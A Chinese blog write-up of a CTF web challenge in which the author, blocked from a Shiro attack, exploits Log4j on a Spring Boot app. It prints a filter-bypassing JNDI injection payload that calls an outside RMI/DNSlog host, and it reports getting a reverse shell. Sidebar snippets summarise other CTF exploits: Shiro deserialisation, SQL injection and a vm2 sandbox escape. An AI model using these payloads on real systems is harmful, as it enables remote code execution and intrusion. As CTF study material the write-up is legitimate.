[长安杯]web-shiro复现

最新推荐文章于 2023-04-28 10:15:06 发布
最新推荐文章于 2023-04-28 10:15:06 发布
阅读量2.2k 收藏
点赞数
分类专栏: BUU-WEB 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/122452197
版权

长安杯-shiro?复现

浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
在这里插入图片描述
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
在这里插入图片描述
jndi被过滤了
进行绕过

${${::-j}ndi:rmi://py2hu7.ceye.io/exp}

在这里插入图片描述
在这里插入图片描述
成功接收到dnslog信息。
构建jndi反弹shell,这里反弹shell的命令需要bypass一下

在这里插入代码片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
反弹的有点慢,但是可以成功反弹shell并拿取flag。

TzZzEZ-web
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FEBS-Shiro-jht:FEBS-Shiro个人适应版
02-19
FEBS-Shiro-jht FEBS-Shiro个人适应版 原版地址 原因:主要是因为懒,想找个技术较新,干净的项目作为开发的基础框架,于是找到了FEBS-Shiro初步技术不考虑,前端使用layui解决所有是我最喜欢的 个人适应版修改点:...
springboot-shiro
10-18
在现代Web开发中,权限管理是不可或缺的一部分,尤其对于企业级应用来说更是如此。SpringBoot以其轻量级、便捷的特性,已经成为Java开发的首选框架之一。而Apache Shiro则是一款强大的安全框架,能够很好地处理认证...
log4j反弹shell
qq_33834637的博客
04-25 4450
漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记录到日志时,攻击者通过构造特殊请求,来触发 Apache
Shiro历史漏洞复现 - Shiro-721
HAKUNAMATATATTA的博客
01-04 1929
由于 Apache Shiro cookie 中通过 AES-128-CBC 模式加密的 rememberMe 字段存 在问题,用户可通过 Padding Oracle 加密生成的攻击代码来构造恶意的 rememberMe 字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。由于漏洞利用需要一个合法的登录账号,这里利用账号正常登陆获取一个有效的rememberMe cookie ,并记录下这个rememberMe的值。爆破成功,返回了rememberMe cookies的值。
Shiro历史漏洞复现 - Shiro-550
HAKUNAMATATATTA的博客
01-03 1975
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全。Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基石。
Shiro-721---漏洞复现
最新发布
qq_50854662的博客
04-28 1011
shiro 721-----漏洞复现
SpringMVC-Mybatis-Shiro-redis-0.2-master
01-25
基于SpringMVC Mybatis Shiro Redis 的权限管理系统,该系统已经部署到线上,线上访问地址:http://shiro.itboy.net,登录账号:admin 密码:sojson,,详细教程参考sojson.com/shiro
thymeleaf-extras-shiro-2.0.1
03-09
在thymeleaf-extras-shiro-2.0.1-SNAPSHOT-javadoc.jar中,包含了该版本的API文档。这对于开发者来说是非常宝贵的资源,因为它提供了详细的类和方法说明,可以帮助开发者快速理解和使用Thymeleaf-extras-shiro的各项...
FEBS-Shiro-2.0.zip
06-04
**Web、JS、JQUERY** 这些标签表明FEBS-Shiro-2.0不仅包含了后端服务,还涵盖了前端交互和页面展示。Web通常指的是Web应用开发,这里可能是指使用了Spring MVC或者Thymeleaf等技术进行的服务器端渲染。JS...
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7366
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码中,提供了一个github地址。
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4343
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3257
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2938
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
BUUCTF-[红明谷CTF 2021]write_shell
qq_24033605的博客
11-02 529
[红明谷CTF 2021]write_shell 源码放出来了,直接进行代码审计: 从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。 首先进行pwd操作,查看当前目录: 接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件: /?action=upload&data=&lt
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 500
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
BUU-WEB-[极客大挑战 2019]PHP
qq_24033605的博客
05-09 493
[极客大挑战 2019]PHP 查看源码没有任何提示,于是爆破一下,看有没有其他子页面。结果爆破出一个www.zip的备份压缩包。 flag.php源码: <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> (可惜,这不是flag) index.php部分源码: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select);
BUU-WEB-[GWCTF 2019]枯燥的抽奖
qq_24033605的博客
05-22 491
[GWCTF 2019]枯燥的抽奖 查看源码发现有个check.php,进去看一看。 mt_seed爆破工具 先通过python脚本进行爆破 str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' str2 = 'TvsDPWvODH'#页面产生的随机数 str3 = str1[::-1] length = len(str2) res = '' for i in range(len(str2)): for j
BUU-WEB-[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_24033605的博客
05-12 457
[CISCN2019 华北赛区 Day2 Web1]Hack World 先尝试输入一个1 再尝试猜测闭合。 先尝试单引号 做个小总结,首先根据回显可以判断是布尔类型注入,并且有过滤。 于是利用burp进行fuzz测试看看过滤了哪些关键字。 (472是没有被过滤的) 于是根据布尔类型的注入有了一个想法,将flag表里的东西一个字符一个字符的根据ASCII值判断出来,根据bool回显判断对错。 爆破脚本: import requests #地址 url = "http://2a876d2c-e
thymeleaf-extras-shiro
04-11
'b'thymeleaf-extras-shiro'是一个Thymeleaf模板引擎的扩展,用于和Apache Shiro安全框架集成,方便在Thymeleaf模板中显示和控制用户的身份验证和授权信息。'
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值